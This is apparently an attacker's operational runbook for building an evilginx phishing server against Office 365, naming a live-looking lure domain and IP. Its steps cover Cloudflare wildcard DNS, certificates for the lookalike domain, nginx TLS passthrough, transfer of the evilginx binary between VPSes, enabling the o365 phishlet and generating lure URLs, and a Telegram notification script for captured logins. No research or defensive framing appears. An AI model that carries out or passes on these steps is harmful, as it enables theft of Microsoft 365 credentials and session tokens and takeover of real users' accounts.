VPS Setup Runbook

Confirmed working — office-auth.com / 80.78.18.72 (S42)

Every step confirmed. Follow in order. Dead ends at /dead-ends.

Prerequisites

VPS with root access (Ubuntu 22/24) · Domain on Cloudflare · evilginx Jan Bakker fork binary · Telegram bot token + chat ID

Step 1 — Cloudflare DNS

Proxy must be OFF (grey cloud).

Type	Name	Content	Note
A	@	VPS IP	root domain
A	*	VPS IP	all subdomains

Step 2 — Cloudflare API Token

Profile > API Tokens > Create Token > Edit zone DNS template. Select the domain. Copy the token.

echo "PASTE_TOKEN_HERE" > /root/.cf_creds
chmod 600 /root/.cf_creds

Step 3 — Wildcard SSL Cert

apt-get install -y certbot python3-certbot-dns-cloudflare
TOKEN=$(cat /root/.cf_creds | tr -d '[:space:]')
echo "dns_cloudflare_api_token = $TOKEN" > /root/.cloudflare.ini
chmod 600 /root/.cloudflare.ini

certbot certonly --dns-cloudflare   --dns-cloudflare-credentials /root/.cloudflare.ini   -d yourdomain.com -d '*.yourdomain.com'   --non-interactive --agree-tos -m admin@yourdomain.com

Step 4 — Nginx SNI Passthrough

apt-get install -y nginx libnginx-mod-stream

Write /etc/nginx/nginx.conf:

load_module /usr/lib/nginx/modules/ngx_stream_module.so;
user www-data;
worker_processes auto;
pid /run/nginx.pid;
events { worker_connections 1024; }
stream {
    server {
        listen 443;
        proxy_pass 127.0.0.1:8443;
        proxy_timeout 600s;
        proxy_connect_timeout 10s;
    }
}
http { server { listen 81; return 301 https://$host$request_uri; } }

nginx -t && nginx

Step 5 — Transfer Evilginx Binary

ssh -i ~/.ssh/id_ed25519 root@OLD_IP "tar -czf - -C /root evilginx-bakker" |   ssh -i ~/.ssh/id_ed25519_njalla root@NEW_IP "tar -xzf - -C /root"

Step 6 — Place Certs for Evilginx

mkdir -p /root/.evilginx/crt/yourdomain.com
cp /etc/letsencrypt/live/yourdomain.com/fullchain.pem    /root/.evilginx/crt/yourdomain.com/o365.crt
cp /etc/letsencrypt/live/yourdomain.com/privkey.pem    /root/.evilginx/crt/yourdomain.com/o365.key

Step 7 — Configure Evilginx

tmux new -s evil
cd /root/evilginx-bakker && ./bin/evilginx -p ./phishlets

Inside evilginx shell:

config domain yourdomain.com
config ip VPS_IP
phishlets hostname o365 yourdomain.com
phishlets enable o365
lures create o365
lures get-url 0

Step 8 — PM2 Notify Script

pm2 start /root/evilginx_notify.py --name evilginx-notify --interpreter python3
pm2 save